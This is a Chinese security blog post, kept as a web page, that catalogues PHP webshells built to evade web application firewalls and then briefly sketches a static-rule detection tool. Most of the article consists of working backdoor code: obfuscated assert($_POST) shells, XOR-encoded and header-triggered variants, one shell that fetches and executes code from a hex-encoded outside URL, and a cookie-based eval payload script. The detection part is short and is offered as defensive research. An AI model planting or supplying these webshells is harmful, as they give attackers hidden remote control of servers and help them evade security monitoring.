<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="WAF绕过,PHP,webshell,文件上传,后门," />





  <link rel="alternate" href="/atom.xml" title="瓦都剋" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.1" />






<meta name="description" content="之前在Webshell查杀的新思路中留了一个坑🙄️，当时没有找到具体找到全部变量的方法，后来通过学习找到了个打印全部量的方法，并再次学习了下PHP webshell绕过WAF的方法，以此来验证下此方法是否合理。  如有错误，还请指出，不胜感激！ 🐢拜">
<meta name="keywords" content="WAF绕过,PHP,webshell,文件上传,后门">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP常见过waf webshell及最简单检测方法">
<meta property="og:url" content="http://byd.dropsec.xyz/2019/05/20/PHP常见过waf-webshell及最简单检测方法/index.html">
<meta property="og:site_name" content="瓦都剋">
<meta property="og:description" content="之前在Webshell查杀的新思路中留了一个坑🙄️，当时没有找到具体找到全部变量的方法，后来通过学习找到了个打印全部量的方法，并再次学习了下PHP webshell绕过WAF的方法，以此来验证下此方法是否合理。  如有错误，还请指出，不胜感激！ 🐢拜">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://blog.w2n1ck.com/enable.jpg">
<meta property="og:image" content="http://blog.w2n1ck.com/webshell_include.png">
<meta property="og:image" content="http://blog.w2n1ck.com/webshell_1.png">
<meta property="og:image" content="http://blog.w2n1ck.com/webshell%E6%AD%A3%E5%88%99.png">
<meta property="og:updated_time" content="2019-05-20T13:43:17.941Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="PHP常见过waf webshell及最简单检测方法">
<meta name="twitter:description" content="之前在Webshell查杀的新思路中留了一个坑🙄️，当时没有找到具体找到全部变量的方法，后来通过学习找到了个打印全部量的方法，并再次学习了下PHP webshell绕过WAF的方法，以此来验证下此方法是否合理。  如有错误，还请指出，不胜感激！ 🐢拜">
<meta name="twitter:image" content="http://blog.w2n1ck.com/enable.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"hide","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"输入关键词进行搜索","hits_empty":"找不到关于“${query}”的文章","hits_stats":"共找到 ${hits} 篇文化在那个，花了 ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://byd.dropsec.xyz/2019/05/20/PHP常见过waf-webshell及最简单检测方法/"/>





  <title>PHP常见过waf webshell及最简单检测方法 | 瓦都剋</title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?61c879c1c104a92aab1d6e4b6888ffe5";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>











  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">瓦都剋</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Looking at yourself from a different Angle!</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-wx">
          <a href="/wx" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-wrench"></i> <br />
            
            微信公众号
          </a>
        </li>
      
        
        <li class="menu-item menu-item-daohang">
          <a href="/daohang" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-globe"></i> <br />
            
            导航
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://byd.dropsec.xyz/2019/05/20/PHP常见过waf-webshell及最简单检测方法/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="瓦都剋">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="瓦都剋">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">PHP常见过waf webshell及最简单检测方法</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-05-20T21:33:04+08:00">
                2019-05-20
              </time>
            

            

            
          </span>

          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2019/05/20/PHP常见过waf-webshell及最简单检测方法/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count"
                        data-disqus-identifier="2019/05/20/PHP常见过waf-webshell及最简单检测方法/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计</span>
                
                <span title="字数统计">
                  857
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长</span>
                
                <span title="阅读时长">
                  4
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>之前在<a href="http://byd.dropsec.xyz/2017/04/27/Webshell%E6%9F%A5%E6%9D%80%E7%9A%84%E6%96%B0%E6%80%9D%E8%B7%AF/">Webshell查杀的新思路</a>中留了一个坑🙄️，当时没有找到具体找到全部变量的方法，后来通过学习找到了个打印全部量的方法，并再次学习了下PHP webshell绕过WAF的方法，以此来验证下此方法是否合理。</p>
<blockquote>
<p>如有错误，还请指出，不胜感激！ 🐢拜</p>
</blockquote>
<a id="more"></a>
<p>在那篇文章中我突然想到一种检测webshell的方法，就是首先获取到当前文件中的所有变量（不明白的可以先去看下之前的文章），然后再根据正则库进行静态检测。</p>
<p>自认为这种方法虽然会检测不完全（每个检测机制都不能保障全部有效），但是感觉非常简单、实用，也没那么多高深的道理。</p>
<p><img src="http://blog.w2n1ck.com/enable.jpg" alt=""></p>
<p>为了验证该检测机制，首先了解下目前PHP webshell绕过WAF的方法。</p>
<h2 id="常见绕过WAF的PHP-webshell"><a href="#常见绕过WAF的PHP-webshell" class="headerlink" title="常见绕过WAF的PHP webshell"></a>常见绕过WAF的PHP webshell</h2><h3 id="字符串变形"><a href="#字符串变形" class="headerlink" title="字符串变形"></a>字符串变形</h3><p>大小写、编码、截取、替换、特殊字符拼接、null、回车、换行、特殊字符串干扰</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">$a = base64_decode(<span class="string">"YXNzYXNz+00000____"</span>);</div><div class="line">$a = substr_replace($a,<span class="string">"ert"</span>,<span class="number">3</span>);</div><div class="line">$a($_POST[<span class="string">'x'</span>]);</div><div class="line"><span class="meta">?&gt;</span></div><div class="line"></div><div class="line">ucwords()</div><div class="line">ucfirst()</div><div class="line">trim()</div><div class="line">substr_replace()</div><div class="line">substr()</div><div class="line">strtr()</div><div class="line">strtoupper()</div><div class="line">strtolower()</div><div class="line">strtok()</div><div class="line">str_rot13()</div><div class="line">chr()</div><div class="line">gzcompress()、gzdeflate()、gzencode()</div><div class="line">gzuncompress()、gzinflate()、gzdecode()</div><div class="line">base64_encode()</div><div class="line">base64_decode()</div><div class="line">pack()</div><div class="line">unpack()</div></pre></td></tr></table></figure>
<h3 id="自写函数"><a href="#自写函数" class="headerlink" title="自写函数"></a>自写函数</h3><p>利用<code>assert()</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span> </div><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">test</span><span class="params">($a)</span></span>&#123;</div><div class="line">    $a($_POST[<span class="string">'x'</span>]);</div><div class="line">&#125;</div><div class="line">test(assert);</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<h3 id="回调函数"><a href="#回调函数" class="headerlink" title="回调函数"></a>回调函数</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span> </div><div class="line">call_user_func(assert,<span class="keyword">array</span>($_POST[x]));</div><div class="line"><span class="meta">?&gt;</span></div><div class="line"></div><div class="line">call_user_func_array()</div><div class="line">array_filter() </div><div class="line">array_walk()  </div><div class="line">array_map()</div><div class="line">registregister_shutdown_function()</div><div class="line">register_tick_function()</div><div class="line">filter_var() </div><div class="line">filter_var_array() </div><div class="line">uasort() </div><div class="line">uksort() </div><div class="line">array_reduce()</div><div class="line">array_walk() </div><div class="line">array_walk_recursive()</div><div class="line">forward_static_call_array()</div></pre></td></tr></table></figure>
<h3 id="类"><a href="#类" class="headerlink" title="类"></a>类</h3><p>利用魔术方法、析构函数<code>__destruct()</code>，<code>__construct()</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span> </div><div class="line"><span class="class"><span class="keyword">class</span> <span class="title">test</span></span></div><div class="line"><span class="class"></span>&#123;</div><div class="line">  <span class="keyword">public</span> $a = <span class="string">''</span>;</div><div class="line">  <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span></span>&#123;</div><div class="line">    assert(<span class="string">"$this-&gt;a"</span>);</div><div class="line">  &#125;</div><div class="line">&#125;</div><div class="line">$b = <span class="keyword">new</span> test;</div><div class="line">$b-&gt;a = $_POST[<span class="string">'x'</span>];</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<h3 id="利用外部文件"><a href="#利用外部文件" class="headerlink" title="利用外部文件"></a>利用外部文件</h3><p>利用<code>curl</code>, <code>fsockopen</code>等发起网络请求再结合<code>file_get_contents</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">error_reporting(<span class="number">0</span>);</div><div class="line">session_start();</div><div class="line">header(<span class="string">"Content-type:text/html;charset=utf-8"</span>);<span class="keyword">if</span>(<span class="keyword">empty</span>($_SESSION[<span class="string">'api'</span>]))</div><div class="line">$_SESSION[<span class="string">'api'</span>]=substr(file_get_contents(sprintf(<span class="string">'%s?%s'</span>,pack(<span class="string">"H*"</span>,</div><div class="line"><span class="string">'687474703a2f2f7777772e77326e31636b2e636f6d2f7368656c6c2f312e6a7067'</span>),uniqid())),<span class="number">3649</span>);</div><div class="line">@preg_replace(<span class="string">"~(.*)~ies"</span>,gzuncompress($_SESSION[<span class="string">'api'</span>]),<span class="keyword">null</span>);</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<h3 id="无字符特征马"><a href="#无字符特征马" class="headerlink" title="无字符特征马"></a>无字符特征马</h3><p>编码、异或、自增</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">$_=(<span class="string">'%01'</span>^<span class="string">'`'</span>).(<span class="string">'%13'</span>^<span class="string">'`'</span>).(<span class="string">'%13'</span>^<span class="string">'`'</span>).(<span class="string">'%05'</span>^<span class="string">'`'</span>).(<span class="string">'%12'</span>^<span class="string">'`'</span>).(<span class="string">'%14'</span>^<span class="string">'`'</span>); <span class="comment">// $_='assert';</span></div><div class="line">$__=<span class="string">'_'</span>.(<span class="string">'%0D'</span>^<span class="string">']'</span>).(<span class="string">'%2F'</span>^<span class="string">'`'</span>).(<span class="string">'%0E'</span>^<span class="string">']'</span>).(<span class="string">'%09'</span>^<span class="string">']'</span>); <span class="comment">// $__='_POST';</span></div><div class="line">$___=$$__;</div><div class="line">$_($___[_]); <span class="comment">// assert($_POST[_]);</span></div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<h3 id="特殊请求头"><a href="#特殊请求头" class="headerlink" title="特殊请求头"></a>特殊请求头</h3><p>利用<code>getallheaders()</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">$cai=getallheaders()[<span class="string">'cai'</span>];</div><div class="line">$dao=getallheaders()[<span class="string">'dao'</span>];</div><div class="line"><span class="keyword">if</span>($cai!=<span class="string">""</span> <span class="keyword">and</span> $dao!=<span class="string">""</span>)&#123;</div><div class="line">  $cai=gzuncompress(base64_decode($cai));$cai(gzuncompress(base64_decode($dao)));</div><div class="line">&#125;</div><div class="line">header(<span class="string">'HTTP/1.1 404 Not Found'</span>);</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<h3 id="全局变量"><a href="#全局变量" class="headerlink" title="全局变量"></a>全局变量</h3><p>利用<code>getenv()</code>，<code>arrag_flip()</code>，<code>get_defined_vars()</code>，<code>session_id()</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> requests</div><div class="line">url = <span class="string">'http://localhost/?code=eval(hex2bin(session_id(session_start())));'</span></div><div class="line">payload = <span class="string">"phpinfo();"</span>.encode(<span class="string">'hex'</span>)</div><div class="line">cookies = &#123;</div><div class="line">	<span class="string">'PHPSESSID'</span>:payload</div><div class="line">&#125;</div><div class="line">r = requests.get(url=url,cookies=cookies)</div><div class="line"><span class="keyword">print</span> r.content</div></pre></td></tr></table></figure>
<h3 id="PHP混淆加解密"><a href="#PHP混淆加解密" class="headerlink" title="PHP混淆加解密"></a>PHP混淆加解密</h3><p>以phpjiami为例</p>
<p>就是将函数名、变量名全部变成”乱码”，且改动任意一个地方，都将导致文件不能运行。具体可访问：<a href="https://www.phpjiami.com/" target="_blank" rel="external">https://www.phpjiami.com/</a></p>
<h2 id="PHP-webshell检测方法"><a href="#PHP-webshell检测方法" class="headerlink" title="PHP webshell检测方法"></a>PHP webshell检测方法</h2><p>目前我所了解的webshell检测方式有：</p>
<ol>
<li>机器学习检测webshell：比如混淆度、最长单词、重合指数、特征、压缩比等</li>
<li>动态检测（沙箱）</li>
<li>基于流量模式检测webshell：agent</li>
<li>逆向算法+静态匹配检测webshell：比如D盾webshell查杀</li>
<li>根据文件入度出度来检测</li>
</ol>
<h3 id="实例展示"><a href="#实例展示" class="headerlink" title="实例展示"></a>实例展示</h3><p>这里以PHPjiami的webshell为例，其中<code>2.php</code>即为phpjiama的木马</p>
<p><img src="http://blog.w2n1ck.com/webshell_include.png" alt=""></p>
<p><img src="http://blog.w2n1ck.com/webshell_1.png" alt=""></p>
<p>可以明显看到明显的webshell规则了，这样再用静态规则、正则等即可轻松检测到。</p>
<h3 id="简单检测思路"><a href="#简单检测思路" class="headerlink" title="简单检测思路"></a>简单检测思路</h3><p>检测思路：</p>
<blockquote>
<p> 文件上传-&gt;文件包含-&gt;获取所有文件中的变量到临时文件中-&gt;静态规则匹配临时文件-&gt;返回匹配结果</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div></pre></td><td class="code"><pre><div class="line">├── __init__.py</div><div class="line">├── conf</div><div class="line">│   ├── __init__.py</div><div class="line">│   ├── config.py</div><div class="line">├── core</div><div class="line">│   ├── __init__.py</div><div class="line">│   ├── all_check.py</div><div class="line">│   ├── data_mysql.py</div><div class="line">│   └── file_inotify.py</div><div class="line">├── lib</div><div class="line">│   ├── __init__.py</div><div class="line">│   └── semantic_analysis_api.py</div><div class="line">├── test</div><div class="line">│   ├── __init__.py</div><div class="line">│   ├── file_md5_move.py</div><div class="line">│   ├── os_check.py</div><div class="line">│   ├── random_file_test.py</div><div class="line">│   └── ...</div><div class="line">├── web</div><div class="line">│   ├── static</div><div class="line">│   │   ├── css</div><div class="line">│   │   │   ├── main.css</div><div class="line">│   │   ├── images</div><div class="line">│   │   │   └── background.jpg</div><div class="line">│   │   └── js</div><div class="line">│   │       └── upload.js</div><div class="line">│   ├── templates</div><div class="line">│   │   ├── index.html</div><div class="line">│   ├── upload_file.php</div><div class="line">│   └── include_file_to_tmp.php</div><div class="line">├── webshell_check.py</div></pre></td></tr></table></figure>
<p>conf中包含的是诸如下列的静态检测规则</p>
<p><img src="http://blog.w2n1ck.com/webshell%E6%AD%A3%E5%88%99.png" alt=""></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        
  <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
    <div>大爷，赏个铜板呗！</div>
    <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
      <span>赏</span>
    </button>
    <div id="QR" style="display: none;">
      
        <div id="wechat" style="display: inline-block">
          <img id="wechat_qr" src="/images/weixin.png" alt="瓦都剋 WeChat Pay"/>
          <p>微信打赏</p>
        </div>
      
      
        <div id="alipay" style="display: inline-block">
          <img id="alipay_qr" src="/images/zhifubao.png" alt="瓦都剋 Alipay"/>
          <p>支付宝打赏</p>
        </div>
      
    </div>
  </div>


      
    </div>

    <div>
      
        
  <ul class="post-copyright">
    <li class="post-copyright-author">
      <strong>本文作者：</strong>
      瓦都剋
    </li>
    <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="http://byd.dropsec.xyz/2019/05/20/PHP常见过waf-webshell及最简单检测方法/" title="PHP常见过waf webshell及最简单检测方法">http://byd.dropsec.xyz/2019/05/20/PHP常见过waf-webshell及最简单检测方法/</a>
    </li>
    <li class="post-copyright-license">
      <strong>版权声明： </strong>
      本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
    </li>
  </ul>


      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/WAF绕过/" rel="tag"><i class="fa fa-tag"></i> WAF绕过</a>
          
            <a href="/tags/PHP/" rel="tag"><i class="fa fa-tag"></i> PHP</a>
          
            <a href="/tags/webshell/" rel="tag"><i class="fa fa-tag"></i> webshell</a>
          
            <a href="/tags/文件上传/" rel="tag"><i class="fa fa-tag"></i> 文件上传</a>
          
            <a href="/tags/后门/" rel="tag"><i class="fa fa-tag"></i> 后门</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/05/18/渗透测试中文件上传技巧/" rel="next" title="渗透测试中文件上传技巧">
                <i class="fa fa-chevron-left"></i> 渗透测试中文件上传技巧
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/05/21/基于PhantomJS的动态爬虫引擎/" rel="prev" title="基于PhantomJS的动态爬虫引擎">
                基于PhantomJS的动态爬虫引擎 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
        <!-- JiaThis Button BEGIN -->
<div class="jiathis_style">
  <a class="jiathis_button_tsina"></a>
  <a class="jiathis_button_tqq"></a>
  <a class="jiathis_button_weixin"></a>
  <a class="jiathis_button_cqq"></a>
  <a class="jiathis_button_douban"></a>
  <a class="jiathis_button_renren"></a>
  <a class="jiathis_button_qzone"></a>
  <a class="jiathis_button_kaixin001"></a>
  <a class="jiathis_button_copy"></a>
  <a href="http://www.jiathis.com/share" class="jiathis jiathis_txt jiathis_separator jtico jtico_jiathis" target="_blank"></a>
  <a class="jiathis_counter_style"></a>
</div>
<script type="text/javascript" >
  var jiathis_config={
    hideMore:false
  }
</script>
<script type="text/javascript" src="http://v3.jiathis.com/code/jia.js" charset="utf-8"></script>
<!-- JiaThis Button END -->

      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.png"
               alt="瓦都剋" />
          <p class="site-author-name" itemprop="name">瓦都剋</p>
           
              <p class="site-description motion-element" itemprop="description">Looking at yourself from a different Angle!</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">118</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">109</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/w2n1ck" target="_blank" title="Weibo">
                  
                    <i class="fa fa-fw fa-heartbeat"></i>
                  
                  Weibo
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://github.com/w2n1ck" target="_blank" title="Github">
                  
                    <i class="fa fa-fw fa-heartbeat"></i>
                  
                  Github
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://vulwiki.readthedocs.io/" target="_blank" title="Zhihu">
                  
                    <i class="fa fa-fw fa-heartbeat"></i>
                  
                  Zhihu
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              友情链接
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://wkh.dropsec.xyz" title="王小洪" target="_blank">王小洪</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://fgp.dropsec.xyz" title="冯小鹏" target="_blank">冯小鹏</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://blog.neargle.com/" title="周小斌" target="_blank">周小斌</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://am4zing.me/" title="王小岩" target="_blank">王小岩</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://yangge.me/" title="杨大成" target="_blank">杨大成</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.dropsec.xyz/" title="团队主页" target="_blank">团队主页</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://vulwiki.readthedocs.io/" title="漏洞知识库" target="_blank">漏洞知识库</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.w2n1ck.com/" title="新博客" target="_blank">新博客</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
